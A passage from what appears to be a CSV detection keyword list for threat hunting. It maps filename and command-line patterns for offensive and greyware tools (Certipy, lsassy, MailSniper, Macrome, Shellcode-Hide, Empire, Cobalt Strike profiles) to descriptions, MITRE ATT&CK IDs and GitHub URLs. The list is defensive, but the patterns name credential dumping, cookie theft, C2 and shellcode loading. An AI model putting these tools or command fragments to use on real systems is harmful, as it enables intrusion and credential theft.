It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure","T1552.004 - T1003.003 - T1114.002","TA0006 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/grimlockx/ADCSKiller","1","1","N/A","N/A","6","536","53","2023-05-19T17:36:37Z","2023-05-19T06:51:41Z" +"*ly4k/Certipy*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","1","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*ly4k/PassTheChallenge*","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1552.004","TA0003","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","1","N/A","N/A","4","308","22","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" +"*lyncsmash*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations","T1580 - T1201 - T1071 - T1110 - T1078","TA0043 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" +"*lyncsmash.git*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" +"*lyncsmash.log*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential 
Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" +"*lyncsmash.py*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" +"*lyncsmash-master*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" +"*LyncSniper*","offensive_tool_keyword","LyncSniper","LyncSniper is a tool for penetration testing Lync and Skype for Business deployments hosted either on premise or in Office 365","T1566 - T1574 - T1210 - T1596","TA0002 - TA0011 - TA0009","N/A","N/A","Exploitation tools","https://github.com/mdsecactivebreach/LyncSniper","1","0","N/A","N/A","1","9","3","2017-04-11T08:38:28Z","2017-06-12T10:56:58Z" +"*-m * -d * -w * --top-web-ports*","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","0","N/A","N/A","4","376","52","2022-03-10T12:08:17Z","2022-02-20T15:09:40Z" +"*-m dumpert *","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","0","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*-M handlekatz -o *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing 
the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*M.i.m.i.k.a.t.z*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" +"*m00zh33/golang_c2*","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1043 - T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","1","N/A","10","10","4","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z" +"*m0rv4i/SharpCookieMonster*","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. 
even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","2","184","41","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z" +"*m3f157O/combine_harvester*","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","1","N/A","10","2","101","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z" +"*m4ll0k/SecretFinder*","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","1","N/A","N/A","10","1526","324","2023-06-13T00:49:58Z","2020-06-08T10:50:12Z" +"*MAAD_Attack.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" +"*MAAD_Config.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. 
","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" +"*MAAD_Mitre_Map.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" +"*MAADInitialization.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. 
","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" +"*mac.changer on*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*mac_dirty_cow.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*mac2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*mac2john-alt.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*MaccaroniC2.git*","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","10","10","57","9","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" +"*macchanger -r *","greyware_tool_keyword","macchanger","changing mac address with macchanger","T1497.001 - T1036.004 - T1059.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","5","10","N/A","N/A","N/A","N/A" +"*macchanger -r*","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & 
Spoofing","https://github.com/SxNade/Rudrastra","1","0","N/A","8","1","46","21","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z" +"*macdlemfnignjhclfcfichcdhiomgjjb*","greyware_tool_keyword","Free Fast VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*MaceTrap.exe*","offensive_tool_keyword","macetrap","MaceTrap is a proof-of-concept for time stomping using SetFileTime. MaceTrap allows you to set the CreationTime / LastAccessTime / LastWriteTime for arbitrary files and folders","T1070.004","TA0040","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/MaceTrap","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*machine1337/TelegramRAT*","offensive_tool_keyword","TelegramRAT","Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions","T1071.001 - T1105 - T1027","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/machine1337/TelegramRAT","1","1","N/A","10","10","198","35","2023-08-25T13:41:49Z","2023-06-30T10:59:55Z" +"*MacOS/ipscan -*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" +"*macro_pack*","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. 
Now it also handles various shortcuts formats.","T1566.001 - T1564.001 - T1564.003","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","1950","404","2022-05-12T13:30:29Z","2017-10-03T18:30:06Z" +"*MacroDetectSandbox.vbs*","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2282","458","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z" +"*MacroExploit.txt*","offensive_tool_keyword","Excel-Exploit","MacroExploit use in excel sheet","T1137.001 - T1203 - T1059.007 - T1566.001 - T1564.003","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Mr-Cyb3rgh0st/Excel-Exploit/tree/main","1","1","N/A","N/A","1","21","4","2023-06-12T11:47:52Z","2023-06-12T11:46:53Z" +"*Macrome *--decoy-document*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" +"*Macrome *--payload*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. 
Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" +"*Macrome build*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" +"*Macrome.csproj*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" +"*Macrome.dll*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. 
Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" +"*Macrome.sln*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" +"*MACshellcode.cpp*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*MACshellcode.exe*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*MACshellcode.sln*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp 
socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*MACshellcode.vcxproj*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*magicRasMan*","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","10","4","353","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" +"*Magnitude Exploit Kit*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","0","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" +"*mailpv.exe*","offensive_tool_keyword","mailpv","Mail PassView is a small password-recovery tool that reveals the passwords and other account details in email clients","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/mailpv.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*mailpv.zip*","offensive_tool_keyword","mailpv","Mail PassView is a small password-recovery tool that reveals the passwords and other account details in email clients","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/mailpv.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
+"*MailSniper*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc...). It can be used as a non-administrative user to search their own email. or by an Exchange administrator to search the mailboxes of every user in a domain","T1083 - T1114 - T1003","TA0003 - TA0007 - TA0040","N/A","N/A","Information Gathering","https://github.com/dafthack/MailSniper","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*MailSniper.ps1*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*main/gcr.py*","offensive_tool_keyword","GCR-Google-Calendar-RAT","Google Calendar RAT is a PoC of Command&Control over Google Calendar Events","T1071.001 - T1021.002 - T1059","TA0002 - TA0005","N/A","N/A","C2","https://github.com/MrSaighnal/GCR-Google-Calendar-RAT","1","1","N/A","10","10","78","15","2023-06-26T09:04:02Z","2023-06-18T13:23:31Z" +"*main_air_service-probes.go*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - 
T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" +"*main_pro_service-probes.go*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang 
Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" +"*majdfhpaihoncoakbjgbdhglocklcgno*","greyware_tool_keyword","Free VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*make_avet -l *.exe *","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*make_avetsvc *","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*make_kernel_shellcode*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*make_kernel_user_payload*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - 